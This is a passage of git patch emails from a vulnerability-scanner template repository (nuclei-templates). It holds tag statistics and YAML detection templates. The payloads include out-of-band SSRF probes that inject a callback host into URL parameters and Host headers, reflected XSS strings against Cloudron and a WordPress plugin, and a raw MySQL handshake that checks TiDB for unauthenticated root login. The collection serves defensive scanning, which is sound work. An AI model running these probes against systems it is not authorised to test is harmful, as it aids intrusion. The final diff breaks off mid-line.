| | | | | | | +| proftpd | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| s3 | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 079531ae29..7986a5f646 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 725 | pikpikcu | 273 | cves | 725 | info | 643 | http | 1965 | -| lfi | 260 | dhiyaneshdk | 258 | vulnerabilities | 301 | high | 553 | file | 46 | -| panel | 248 | daffainfo | 213 | exposed-panels | 247 | medium | 448 | network | 41 | -| xss | 244 | pdteam | 195 | technologies | 191 | critical | 273 | dns | 12 | -| exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | | -| wordpress | 223 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 198 | gy741 | 72 | takeovers | 64 | | | | | -| tech | 181 | pussycat0x | 67 | default-logins | 56 | | | | | -| cve2020 | 164 | madrobot | 61 | file | 46 | | | | | -| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | +| cve | 731 | pikpikcu | 273 | cves | 731 | info | 650 | http | 1983 | +| lfi | 265 | dhiyaneshdk | 263 | vulnerabilities | 307 | high | 558 | file | 46 | +| panel | 252 | daffainfo | 216 | exposed-panels | 250 | medium | 451 | network | 42 | +| xss | 246 | pdteam | 196 | technologies | 192 | critical | 276 | dns | 12 | +| exposure | 233 | geeknik | 153 | exposures | 188 | low | 153 | | | +| wordpress | 229 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| rce | 199 | gy741 | 75 | takeovers | 64 | | | | | +| tech | 183 | pussycat0x | 68 | default-logins | 56 | | | | | +| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | +| wp-plugin | 155 | madrobot | 61 | workflows | 37 | | | | | From bd6b22ee841a4e2e7121ac0e46b46584613dfb55 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 09:46:59 +0000 Subject: [PATCH 25/67] Auto README Update [Tue Sep 28 09:46:59 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 380e7c1928..0b53bebb69 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | cve2020 | 164 | madrobot | 61 | file | 46 | | | | | | wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | -**166 directories, 2139 files**. +**166 directories, 2144 files**. From 52a5e335563be3c7b73f20d213b491f798d5166a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:17:21 +0530 Subject: [PATCH 26/67] Create generic-oob-param-based-interaction.yaml --- .../generic-oob-param-based-interaction.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 vulnerabilities/generic/generic-oob-param-based-interaction.yaml diff --git a/vulnerabilities/generic/generic-oob-param-based-interaction.yaml b/vulnerabilities/generic/generic-oob-param-based-interaction.yaml new file mode 100644 index 0000000000..429facfaee --- /dev/null +++ b/vulnerabilities/generic/generic-oob-param-based-interaction.yaml @@ -0,0 +1,21 @@ +id: generic-oob-param-based-interaction + +info: + name: Parameter Based Generic OOB Interaction + author: pdteam + severity: info + description: The remote server fetched a spoofed URL from the request parameters. + reference: https://github.com/PortSwigger/collaborator-everywhere + tags: oob,ssrf,generic + +requests: + - method: GET + path: + - "{{BaseURL}}/?u=http://{{interactsh-url}}/&href=http://{{interactsh-url}}/&action=http://{{interactsh-url}}/&host={{interactsh-url}}&http_host={{interactsh-url}}&email=root@{{interactsh-url}}&url=http://{{interactsh-url}}/&load=http://{{interactsh-url}}/&preview=http://{{interactsh-url}}/&target=http://{{interactsh-url}}/&proxy=http://{{interactsh-url}}/&from=http://{{interactsh-url}}/&src=http://{{interactsh-url}}/&ref=http://{{interactsh-url}}/&referrer=http://{{interactsh-url}}/" + + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" From 8042d1233e8fa817c13fe165ae00a695e707bea2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:18:26 +0530 Subject: [PATCH 27/67] Create request-interaction-oob.yaml --- .../generic/request-interaction-oob.yaml | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 vulnerabilities/generic/request-interaction-oob.yaml diff --git a/vulnerabilities/generic/request-interaction-oob.yaml b/vulnerabilities/generic/request-interaction-oob.yaml new file mode 100644 index 0000000000..15534c994d --- /dev/null +++ b/vulnerabilities/generic/request-interaction-oob.yaml @@ -0,0 +1,49 @@ +id: request-interaction-oob + +info: + name: OOB Request Based Interaction + author: pdteam + severity: info + description: The remote server fetched a spoofed DNS Name from the request. + reference: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface + tags: oob,ssrf,generic + +requests: + - raw: + - |+ + GET / HTTP/1.1 + Host: {{interactsh-url}} + Cache-Control: no-transform + Accept: */* + + - |+ + GET / HTTP/1.1 + Host: @{{interactsh-url}} + Cache-Control: no-transform + Accept: */* + + - |+ + GET http://{{interactsh-url}}/ HTTP/1.1 + Host: {{Hostname}} + Cache-Control: no-transform + Accept: */* + + - |+ + GET @{{interactsh-url}}/ HTTP/1.1 + Host: {{Hostname}} + Cache-Control: no-transform + Accept: */* + + - |+ + GET {{interactsh-url}}:80/ HTTP/1.1 + Host: {{Hostname}} + Cache-Control: no-transform + Accept: */* + + unsafe: true # Use Unsafe HTTP library for malformed HTTP requests. + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" From 25a971efd4aa8addc2f3b083b1943c58a299bb1c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:21:27 +0530 Subject: [PATCH 28/67] Update and rename generic-oob-header-based-interaction.yaml to oob-header-based-interaction.yaml --- ...based-interaction.yaml => oob-header-based-interaction.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename vulnerabilities/generic/{generic-oob-header-based-interaction.yaml => oob-header-based-interaction.yaml} (97%) diff --git a/vulnerabilities/generic/generic-oob-header-based-interaction.yaml b/vulnerabilities/generic/oob-header-based-interaction.yaml similarity index 97% rename from vulnerabilities/generic/generic-oob-header-based-interaction.yaml rename to vulnerabilities/generic/oob-header-based-interaction.yaml index 5a6ad517a0..399af47472 100644 --- a/vulnerabilities/generic/generic-oob-header-based-interaction.yaml +++ b/vulnerabilities/generic/oob-header-based-interaction.yaml @@ -1,4 +1,4 @@ -id: generic-oob-header-based-interaction +id: oob-header-based-interaction info: name: Header Based Generic OOB Interaction From 97ef8f00e294e689b881d206ea4a5234774f7872 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:21:41 +0530 Subject: [PATCH 29/67] Update and rename generic-oob-param-based-interaction.yaml to oob-param-based-interaction.yaml --- ...-based-interaction.yaml => oob-param-based-interaction.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename vulnerabilities/generic/{generic-oob-param-based-interaction.yaml => oob-param-based-interaction.yaml} (95%) diff --git a/vulnerabilities/generic/generic-oob-param-based-interaction.yaml b/vulnerabilities/generic/oob-param-based-interaction.yaml similarity index 95% rename from vulnerabilities/generic/generic-oob-param-based-interaction.yaml rename to vulnerabilities/generic/oob-param-based-interaction.yaml index 429facfaee..3c3dbce5db 100644 --- a/vulnerabilities/generic/generic-oob-param-based-interaction.yaml +++ b/vulnerabilities/generic/oob-param-based-interaction.yaml @@ -1,4 +1,4 @@ -id: generic-oob-param-based-interaction +id: oob-param-based-interaction info: name: Parameter Based Generic OOB Interaction From cee46ca968d42d9993001777c5aea686c88da651 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:22:30 +0530 Subject: [PATCH 30/67] Update and rename request-interaction-oob.yaml to request-based-interaction.yaml --- ...uest-interaction-oob.yaml => request-based-interaction.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename vulnerabilities/generic/{request-interaction-oob.yaml => request-based-interaction.yaml} (97%) diff --git a/vulnerabilities/generic/request-interaction-oob.yaml b/vulnerabilities/generic/request-based-interaction.yaml similarity index 97% rename from vulnerabilities/generic/request-interaction-oob.yaml rename to vulnerabilities/generic/request-based-interaction.yaml index 15534c994d..e968c99cd6 100644 --- a/vulnerabilities/generic/request-interaction-oob.yaml +++ b/vulnerabilities/generic/request-based-interaction.yaml @@ -1,4 +1,4 @@ -id: request-interaction-oob +id: request-based-interaction info: name: OOB Request Based Interaction From 6a38e21a98ebd8ef418cb251601e30b4fa2936b3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 10:05:39 +0000 Subject: [PATCH 31/67] Auto Generated CVE annotations [Tue Sep 28 10:05:39 UTC 2021] :robot: --- cves/2021/CVE-2021-22005.yaml | 5 +++++ cves/2021/CVE-2021-33544.yaml | 7 ++++++- 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-22005.yaml b/cves/2021/CVE-2021-22005.yaml index 6a7b22b6f6..82caf272c4 100644 --- a/cves/2021/CVE-2021-22005.yaml +++ b/cves/2021/CVE-2021-22005.yaml @@ -10,6 +10,11 @@ info: - https://www.vmware.com/security/advisories/VMSA-2021-0020.html - https://core.vmware.com/vmsa-2021-0020-questions-answers-faq tags: cve,cve2021,vmware,vcenter + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-22005 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml index 0d381d2581..6337242a45 100644 --- a/cves/2021/CVE-2021-33544.yaml +++ b/cves/2021/CVE-2021-33544.yaml @@ -4,10 +4,15 @@ info: name: Geutebruck RCE description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. author: gy741 - severity: critical + severity: high reference: - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ tags: cve,cve2021,geutebruck,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2021-33544 + cwe-id: CWE-77 requests: - raw: From 779302f717fdef66097d0e56e675123f660f43d3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:35:46 +0530 Subject: [PATCH 32/67] Update CVE-2021-40868.yaml --- cves/2021/CVE-2021-40868.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml index efec85092f..ac23724b91 100644 --- a/cves/2021/CVE-2021-40868.yaml +++ b/cves/2021/CVE-2021-40868.yaml @@ -3,17 +3,17 @@ id: CVE-2021-40868 info: name: Cloudron 6.2 Cross Site Scripting author: daffainfo - description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS. severity: medium + description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 tags: cve,cve2021,xss,cloudron requests: - method: GET path: - - '{{BaseURL}}/login.html?returnTo=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E' + - '{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: @@ -28,5 +28,5 @@ requests: - type: word words: - - '">' + - '' part: body From 5c80f9dc4c5824cb0a5c0931597e2fd269854c07 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:38:03 +0530 Subject: [PATCH 33/67] Update and rename wp-church-admin-lfi.yaml to vulnerabilities/wordpress/church-admin-lfi.yaml --- .../wordpress/church-admin-lfi.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) rename wp-church-admin-lfi.yaml => vulnerabilities/wordpress/church-admin-lfi.yaml (59%) diff --git a/wp-church-admin-lfi.yaml b/vulnerabilities/wordpress/church-admin-lfi.yaml similarity index 59% rename from wp-church-admin-lfi.yaml rename to vulnerabilities/wordpress/church-admin-lfi.yaml index b97b529ca9..9885353c52 100644 --- a/wp-church-admin-lfi.yaml +++ b/vulnerabilities/wordpress/church-admin-lfi.yaml @@ -1,11 +1,14 @@ -id: wp-plugin-church-admin-lfi +id: church-admin-lfi info: name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal author: 0x_Akoko severity: high + description: The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack. + reference: + - https://wpscan.com/vulnerability/8997 + - https://id.wordpress.org/plugins/church-admin/ tags: wordpress,wp-plugin,lfi - reference: https://wpscan.com/vulnerability/8997 requests: - method: GET From af85d5f6cc4b4d4ca2a2dce76a2b1c3b97426981 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 15:43:21 +0530 Subject: [PATCH 34/67] Update CVE-2021-39320.yaml --- cves/2021/CVE-2021-39320.yaml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-39320.yaml b/cves/2021/CVE-2021-39320.yaml index 3e5a9c2cc1..9c8808cd68 100644 --- a/cves/2021/CVE-2021-39320.yaml +++ b/cves/2021/CVE-2021-39320.yaml @@ -4,25 +4,29 @@ info: name: underConstruction < 1.19 - Reflected Cross-Site Scripting author: dhiyaneshDK severity: medium + description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path. reference: - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 - tags: wordpress,xss,cves,cve2021 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39320 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-39320 cwe-id: CWE-79 - description: "The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path." + tags: wordpress,xss,cve,cve2021,wp-plugin + requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin.php/">/?page=under-construction' + - '{{BaseURL}}/wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction' + matchers-condition: and matchers: - type: word part: body words: - - '' + - '' + - type: word part: header words: From 783be71a1cedfbe2ecb8cc88bf0efd10639857e1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 10:14:40 +0000 Subject: [PATCH 35/67] Auto Generated CVE annotations [Tue Sep 28 10:14:40 UTC 2021] :robot: --- cves/2021/CVE-2021-22005.yaml | 5 +++++ cves/2021/CVE-2021-33544.yaml | 7 ++++++- 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-22005.yaml b/cves/2021/CVE-2021-22005.yaml index 6a7b22b6f6..82caf272c4 100644 --- a/cves/2021/CVE-2021-22005.yaml +++ b/cves/2021/CVE-2021-22005.yaml @@ -10,6 +10,11 @@ info: - https://www.vmware.com/security/advisories/VMSA-2021-0020.html - https://core.vmware.com/vmsa-2021-0020-questions-answers-faq tags: cve,cve2021,vmware,vcenter + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-22005 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml index 0d381d2581..6337242a45 100644 --- a/cves/2021/CVE-2021-33544.yaml +++ b/cves/2021/CVE-2021-33544.yaml @@ -4,10 +4,15 @@ info: name: Geutebruck RCE description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. author: gy741 - severity: critical + severity: high reference: - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ tags: cve,cve2021,geutebruck,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2021-33544 + cwe-id: CWE-77 requests: - raw: From 1a2ebb42fd91e47f7643b29e37a3d2adf6e2dd9f Mon Sep 17 00:00:00 2001 From: lu4nx Date: Tue, 28 Sep 2021 18:17:35 +0800 Subject: [PATCH 36/67] Add TiDB unauthenticated check plugin --- network/tidb-unauth.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 network/tidb-unauth.yaml diff --git a/network/tidb-unauth.yaml b/network/tidb-unauth.yaml new file mode 100644 index 0000000000..8bdf9d9601 --- /dev/null +++ b/network/tidb-unauth.yaml @@ -0,0 +1,26 @@ +id: tidb-unauth + +info: + name: Unauth TiDB Disclosure + author: lu4nx + severity: high + tags: network,tidb + +network: + - inputs: + - read: 1024 # skip handshake packet + - data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication + type: hex + + host: + - "{{Hostname}}" + - "{{Hostname}}:4000" + + read-size: 1024 + + matchers: + - type: binary + binary: + # resp format: + # 07: length, 02: sequence number, 00: success + - "0700000200000002000000" From 4ab248184ed409a134ee926b170a6ac62e7a7788 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 28 Sep 2021 17:48:10 +0530 Subject: [PATCH 37/67] Add files via upload --- technologies/hp-media-vault.yaml | 21 +++++++++++++++++++++ technologies/ibm-http-server-detect.yaml | 22 ++++++++++++++++++++++ 2 files changed, 43 insertions(+) create mode 100644 technologies/hp-media-vault.yaml create mode 100644 technologies/ibm-http-server-detect.yaml diff --git a/technologies/hp-media-vault.yaml b/technologies/hp-media-vault.yaml new file mode 100644 index 0000000000..58a876747d --- /dev/null +++ b/technologies/hp-media-vault.yaml @@ -0,0 +1,21 @@ +id: hp-media-vault-detect +info: + name: HP Media Vault + author: pussycat0x + severity: info + metadata: + fofa-dork: 'app="HP-Media-Vault-Media-Server"' + tags: tech, hp +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - "HP Media" + condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/technologies/ibm-http-server-detect.yaml b/technologies/ibm-http-server-detect.yaml new file mode 100644 index 0000000000..b913804dcd --- /dev/null +++ b/technologies/ibm-http-server-detect.yaml @@ -0,0 +1,22 @@ +id: ibm-http-server +info: + name: IBM http server + author: pussycat0x + severity: info + metadata: + shodan-dork: 'http.title:"ibm"' + tags: tech, ibm +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - "IBM HTTP Server" + extractors: + - type: regex + part: body + regex: + - "IBM HTTP Server ([0-9.]+)" \ No newline at end of file From b91abeab0957297c2ea18a4869e6e6f52053eb3d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 28 Sep 2021 22:26:37 +0530 Subject: [PATCH 38/67] Create CVE-2021-24226.yaml --- cves/2021/CVE-2021-24226.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2021/CVE-2021-24226.yaml diff --git a/cves/2021/CVE-2021-24226.yaml b/cves/2021/CVE-2021-24226.yaml new file mode 100644 index 0000000000..6216504a91 --- /dev/null +++ b/cves/2021/CVE-2021-24226.yaml @@ -0,0 +1,25 @@ +id: CVE-2021-24226 + +info: + name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage + author: dhiyaneshDK + severity: low + reference: + - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16 + tags: wordpress,cves,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - '<div id="accessally-testing-data"' + condition: and + + - type: status + status: + - 200 From 22cabd2ba8ad371b84a82ec39c1e8fc2faf23874 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 28 Sep 2021 16:57:55 +0000 Subject: [PATCH 39/67] Auto Generated CVE annotations [Tue Sep 28 16:57:55 UTC 2021] :robot: --- cves/2021/CVE-2021-24226.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24226.yaml b/cves/2021/CVE-2021-24226.yaml index 6216504a91..fd84fbc0af 100644 --- a/cves/2021/CVE-2021-24226.yaml +++ b/cves/2021/CVE-2021-24226.yaml @@ -3,10 +3,16 @@ id: CVE-2021-24226 info: name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage author: dhiyaneshDK - severity: low + severity: high reference: - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16 tags: wordpress,cves,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-24226 + cwe-id: CWE-200 + description: "In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required." requests: - method: GET From ed8bc69c87314822c661327aa05043ed30f27453 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 28 Sep 2021 22:33:24 +0530 Subject: [PATCH 40/67] Create CVE-2021-24275.yaml --- cves/2021/CVE-2021-24275.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-24275.yaml diff --git a/cves/2021/CVE-2021-24275.yaml b/cves/2021/CVE-2021-24275.yaml new file mode 100644 index 